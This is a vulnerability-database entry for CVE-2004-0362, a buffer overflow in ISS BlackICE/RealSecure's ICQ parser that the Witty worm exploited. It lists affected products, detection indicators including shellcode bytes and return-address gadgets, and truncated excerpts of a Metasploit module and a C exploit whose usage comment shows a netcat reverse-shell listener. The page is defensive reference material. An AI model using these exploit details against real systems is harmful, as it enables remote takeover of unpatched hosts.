CVE-2004-0362
published 2004-04-15CVE-2004-0362: Multiple stack-based buffer overflows in the ICQ parsing routines of the ISS Protocol Analysis Module (PAM) component, as used in various RealSecure…
PriorityP261high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
73.33%
99.4th percentile
Multiple stack-based buffer overflows in the ICQ parsing routines of the ISS Protocol Analysis Module (PAM) component, as used in various RealSecure, Proventia, and BlackICE products, allow remote attackers to execute arbitrary code via a SRV_MULTI response containing a SRV_USER_ONLINE response packet and a SRV_META_USER response packet with long (1) nickname, (2) firstname, (3) lastname, or (4) email address fields, as exploited by the Witty worm.
Affected
93 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| iss | blackice_agent_server | — | — |
| iss | blackice_agent_server | — | — |
| iss | blackice_agent_server | — | — |
| iss | blackice_agent_server | — | — |
| iss | blackice_agent_server | — | — |
| iss | blackice_agent_server | — | — |
| iss | blackice_agent_server | — | — |
| iss | blackice_pc_protection | — | — |
| iss | blackice_pc_protection | — | — |
| iss | blackice_pc_protection | — | — |
| iss | blackice_pc_protection | — | — |
| iss | blackice_pc_protection | — | — |
| iss | blackice_pc_protection | — | — |
| iss | blackice_pc_protection | — | — |
| iss | blackice_server_protection | — | — |
| iss | blackice_server_protection | — | — |
| iss | blackice_server_protection | — | — |
| iss | blackice_server_protection | — | — |
| iss | blackice_server_protection | — | — |
| iss | blackice_server_protection | — | — |
| iss | blackice_server_protection | — | — |
| iss | proventia_a_series_xpu | — | — |
| iss | proventia_a_series_xpu | — | — |
| iss | proventia_a_series_xpu | — | — |
| iss | proventia_a_series_xpu | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x05\x00\x00\x00\x00\x00\x00\x12\x02
bytes↗
\x05\x00\x00\x00\x00\x00\x00\xde\x03
bytes↗
\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01\xfc\xff\xff\x83\xe4\xfc
- →The exploit binds locally to UDP port 4000 and sends the overflow packet as a single UDP datagram (~1199 bytes). A single oversized UDP packet to a BlackICE/RealSecure host on any port (destination port is randomised) containing the ICQ SRV_MULTI + SRV_META_USER structure is a strong indicator. ↗
- →The exploit can be sent to a broadcast address and with a spoofed source IP. Network detection should not rely solely on source IP matching; inspect payload content for the ICQ opcode sequence 0x0212 / 0x006e / 0x03de within a single UDP datagram. ↗
- →The Metasploit module uses a payload space of 469 bytes (504-31-4) with no NOPs and a stack adjustment of -3500. The overflow overwrites the return address; known RET gadget addresses include 0x5e0a47ef and 0x5e0da1db inside iss-pam1.dll itself, making DLL-specific memory address monitoring viable. ↗
- →The ISS exception handler recovers the process after each overflow, enabling bruteforce exploitation. Repeated UDP packets with the same ICQ SRV_MULTI/SRV_META_USER structure in a short time window (bruteforce pattern) should be alerted on. ↗
- ·The destination UDP port is randomised by the Metasploit module (rand(65536)), so port-based filtering alone will not reliably block or detect this exploit. ↗
- ·The exploit packet can be sent to a broadcast address, meaning a single packet can target all hosts on a subnet simultaneously. Perimeter firewall rules blocking inbound UDP to individual host IPs are insufficient; broadcast UDP must also be filtered. ↗
- ·The source IP of the exploit packet can be spoofed, so source-IP-based ACLs or reputation blocking will not prevent exploitation. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ISS - 'PAM.dll' ICQ Parser Buffer Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2004-0362 ISS - 'PAM.dll' ICQ Parser Buffer Overflow (Metasploit)
ISS - 'PAM.dll' ICQ Parser Buffer Overflow (Metasploit)
---
##
# $Id: blackice_pam_icq.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'ISS PAM.dll ICQ Parser Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the ISS products that use
the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation
will result in arbitrary code execution as LocalSystem. This exploit
only requires 1 UDP packet, which can be both spoofed and sent to a broadcast
address.
The I
Exploit-DB
RealSecure / Blackice - 'iss_pam1.dll' Remote Overflow
exploitdb·2004-03-28
CVE-2004-0362 RealSecure / Blackice - 'iss_pam1.dll' Remote Overflow
RealSecure / Blackice - 'iss_pam1.dll' Remote Overflow
---
/* 557iss_pam_exp - RealSecure / Blackice ICQ iss_pam1.dll remote overflow exploit
*
* Copyright (c) SST 2004 All rights reserved.
*
* Public version
*
* code by Sam (Sam`@efnet) and 2004/03/26
*
*
*
*
*
* Compile: gcc -o 557iss_pam_exp 557iss_pam_exp.c
*
* how works?
* [root@core exp]# ./557iss_pam_exp 192.168.10.2 192.168.10.169 5570
* 557iss_pam_exp - RealSecure / Blackice iss_pam1.dll remote overflow exploit
* - Sam
*
* # attack remote host: 192.168.10.2.
* # listen host: 192.168.10.169.
* # listen port: 5570.
* # send overflow udp datas
* # 1199 bytes send
* # done.
* # make sure we are in, dude :)
*
*
* [root@core root]# nc -vv -l -p 5570
* listening on [any] 5570 ...
* 192.168.10.2: inverse host lookup failed: Host name lo
Metasploit
ISS PAM.dll ICQ Parser Buffer Overflow
metasploit
ISS PAM.dll ICQ Parser Buffer Overflow
ISS PAM.dll ICQ Parser Buffer Overflow
This module exploits a stack buffer overflow in the ISS products that use the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation will result in arbitrary code execution as LocalSystem. This exploit only requires 1 UDP packet, which can be both spoofed and sent to a broadcast address. The ISS exception handler will recover the process after each overflow, giving us the ability to bruteforce the service and exploit it multiple times.
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=107965651712378&w=2http://secunia.com/advisories/11073http://www.ciac.org/ciac/bulletins/o-104.shtmlhttp://www.eeye.com/html/Research/Advisories/AD20040318.htmlhttp://www.kb.cert.org/vuls/id/947254http://www.osvdb.org/4355http://www.securityfocus.com/bid/9913http://xforce.iss.net/xforce/alerts/id/166https://exchange.xforce.ibmcloud.com/vulnerabilities/15442https://exchange.xforce.ibmcloud.com/vulnerabilities/15543http://marc.info/?l=bugtraq&m=107965651712378&w=2http://secunia.com/advisories/11073http://www.ciac.org/ciac/bulletins/o-104.shtmlhttp://www.eeye.com/html/Research/Advisories/AD20040318.htmlhttp://www.kb.cert.org/vuls/id/947254http://www.osvdb.org/4355http://www.securityfocus.com/bid/9913http://xforce.iss.net/xforce/alerts/id/166https://exchange.xforce.ibmcloud.com/vulnerabilities/15442https://exchange.xforce.ibmcloud.com/vulnerabilities/15543
2004-04-15
Published